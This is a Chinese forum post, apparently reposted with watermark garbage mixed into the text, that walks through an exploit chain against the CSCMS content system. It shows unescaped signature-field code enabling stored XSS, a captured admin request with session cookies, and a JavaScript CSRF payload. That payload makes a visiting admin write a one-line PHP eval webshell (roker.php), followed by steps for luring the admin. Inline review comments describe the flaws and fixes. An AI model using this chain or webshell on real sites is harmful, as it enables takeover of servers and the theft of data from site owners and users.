这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下载了源码。
因为后台登录还需要认证码，所以注入就没有看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
, G( f" a3 U- b V1 P1 y% V $ `- G- E$ z8 T/ f- c# J; _7 {9 k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>3 o( w" x4 S& K7 R4 T5 t" }
7 X2 {$ z& S" ^" a
</textarea></td></tr>
9 U' f* s+ z# e& P) g' d+ m) _ $ Q: ^+ T, v% H7 ]& n5 \0 D
user/do.php
4 i& o0 m+ J! A* c4 J
: V c6 H: a7 k. m7 F
4 d9 v( a, q# tif($op=='zl'){ //资料
' m' N( k* \$ Z4 x/ c + O; C$ g3 I3 M4 y
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) + H, J# @1 S7 A0 t
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));6 K; w0 I. n: c( d% ]/ R. u' f _5 o
. z6 p# ~( U' ?0 M$ I6 m
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', ]( m' g0 O( Y- B
5 [6 g% s( ~- J, H# N: o" M
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' q5 f& C' J \/ ?. k8 j+ E
where CS_Name='".$cscms_name."'";
0 q0 J2 d3 L6 w; O% l) @
" Q8 e$ D0 s# {* F, R. Q if($db->query($sql)){; a" r% K& m. k, o* q! f7 o$ |
( A5 e" f; V% f, H7 h- X exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));6 g4 ~) g6 d$ T0 M. z& Y
- L: T- K- }, {8 d1 D) \0 y. S; ?* J }else{
4 N4 P5 s) ^+ N ! P+ ?2 o; ~5 z$ q9 T+ G/ G
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));1 T7 j8 _3 | `% J9 f e: t
6 @/ l2 }6 A6 {# {
}( F) ~ w. G' I! J
9 i( I: d( s# C0 \! v
签名（CS_Qianm）在 do.php 中被直接拼接进 SQL 写入，又在 skin_edit.php 中用 echo 原样输出，两处都没有过滤或转义，因此产生存储型 XSS；修复时应在输出处做 HTML 实体编码，并对拼接进 SQL 的值做转义或改用参数化查询。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包如下。
2 J9 [' a$ L K% P% p
4 D- W# M" S; N& U7 D- O& q* n7 v
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1' {, q& v7 J4 W1 S3 _
, Q9 |3 \* H* `( O) \4 Z, x( z
Accept: text/html, application/xhtml+xml, */*" a1 j. Y" z& [6 F3 }
1 _8 S* Z5 R" H4 o Y" A+ K
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php6 L! \" i: Q1 Y- Q+ D% X: D$ _: A
$ K3 ]4 a6 z0 @7 a3 p2 E; }Accept-Language: zh-CN( }0 R. z; V" r2 O4 y: {
% Q( z, j# N* |* N% b9 O2 Y
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
R" {1 m/ c Z3 l$ u8 |% m# _9 ~ 5 X- {6 U {1 Y6 }8 [
Content-Type: application/x-www-form-urlencoded
: q2 ~6 |( a) L" D1 y * n8 A \& Y; y/ E' V+ ^$ g+ ~
Accept-Encoding: gzip, deflate
. u3 E Z" u1 o) z
9 s* f9 }: s0 e5 t3 OHost: 127.0.0.1# ~2 v$ G- g6 g3 j+ W
2 u9 l, b9 Q6 y7 JContent-Length: 38
- s7 p' n w( ?+ C* F$ Y 4 Z$ i9 j3 I9 e |
DNT: 1$ J; k( b4 o: M! ~; B% P0 l" i( d
! i* ] f7 s3 g5 j; L
Connection: Keep-Alive1 A% w2 ~6 r3 ?, g$ Q; G
6 r8 r; @$ M6 p" K3 U& A
Cache-Control: no-cache" g7 G Y# Q8 C9 d7 T6 ~; p1 ^
P& C( Q* y: [8 U& P2 n
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ B5 W+ v/ }& \2 F
* c8 h7 ^% H- u' s+ ~8 y a8 B6 {; L" C% C; I
name=aaa.php&content=%3Cs%3E%3Ca%25%3E8 x( b+ p* r: o9 N2 z
# b6 R2 S5 A9 Q* P' ~2 y
( }+ E4 O/ P1 C3 o& }' r( h4 ^. R$ D% V
于是构造 JS 如下。
/ e; o9 h4 N3 N本帖隐藏的内容<script>
// NOTE(review): the script is reproduced as posted, forum watermark noise included, so it does
// not parse as-is. What it demonstrates: the admin skins editor accepts a POST carrying only
// `name` and `content` (matching the captured request above) with no anti-forgery token, so a
// page viewed by a logged-in admin can make the browser submit that form with the admin's
// cookies attached (cross-site request forgery).
3 ~0 [2 y I4 I7 c" |thisTHost = top.location.hostname;- i$ G* l5 R! }8 n4 ?% D4 J
. E$ h/ C( b0 C& N( Y
// Target URL: `path` is caller-controlled and contains ".." segments, and `name` (below) carries
// a .php extension; per the post the editor restricts neither. Mitigation on the server side:
// verify a per-session CSRF token on ac=xgmb&op=go, allow-list template extensions for `name`,
// and resolve `path` against the skins root before writing.
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' x! {& O3 \: y5 n3 C7 \
// Builds a hidden POST form with two fields, `name` and `content`, and submits it to `url`.
// `data` becomes the `name` field (file name) and `msg` the `content` field (file body).
% K8 p9 ^& Q0 R( ?' J; z8 jfunction PostSubmit(url, data, msg) {
2 f g5 Z V( h9 y" Q5 J* f var postUrl = url;, @7 e5 G# E$ o+ t# j( h( `: `
) l0 E0 M0 Q) q9 l. h3 `6 C var postData = data;
: i8 i' R* \0 I0 G; O var msgData = msg;
) ~" D1 w. _6 `7 `( P9 M# C var ExportForm = document.createElement("FORM");
; W( S0 t7 A2 f7 A+ b0 V( a0 \9 o document.body.appendChild(ExportForm); , C" B% n8 h, \& H& p2 o! ^* u
ExportForm.method = "POST";
3 Y' j3 q# y$ ^# G( ~ var newElement = document.createElement("input");
8 u0 }; V; A( N3 k: E+ e" }5 B6 Q newElement.setAttribute("name", "name"); 6 h3 C! E; ~! Y
newElement.setAttribute("type", "hidden"); 6 u/ b X# G& D1 b2 }. a# O* ?
var newElement2 = document.createElement("input");
6 _. u! J0 `7 A6 O. h# e newElement2.setAttribute("name", "content"); . }9 p* y- M) p, _! P( c; x
newElement2.setAttribute("type", "hidden");
, Y6 n' v; r0 p! G% a% x% k/ r" L0 @- n; r ExportForm.appendChild(newElement);
7 V) m8 g& {8 N: D* H0 z ExportForm.appendChild(newElement2);
# n; o$ f! j! x+ U9 Y, A" [ newElement.value = postData; ; m5 N+ S n: M* |, M
newElement2.value = msgData; : R7 w0 z2 |+ E& U
ExportForm.action = postUrl; . {7 D5 I; ]6 _: I' Z
// Submission runs with no user interaction as soon as the hosting page renders.
ExportForm.submit(); 8 h* y* U8 I% E( ~! g* _6 j
};
7 H* t4 @3 N9 U+ ]- E 4 R4 e6 G$ U" R8 X
// The posted file body is PHP that evaluates request input, which is why an unrestricted
// extension on this endpoint is a remote code execution sink rather than a mere file write.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
{# B4 i; z: l$ Y' `. e# u : N L x- }' F
</script>; n' ~; `% n L+ W! A& d$ A5 }0 \
/ e0 ?9 t( T) x% a
7 h: u1 {: V" i B& w' J4 G/ C+ V9 A0 C+ @1 E$ Q: m5 n( Q6 y4 ]( J
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入) W) R' K0 C- g8 ]2 u8 f9 A j
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) O- e/ E+ Y: }' U
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |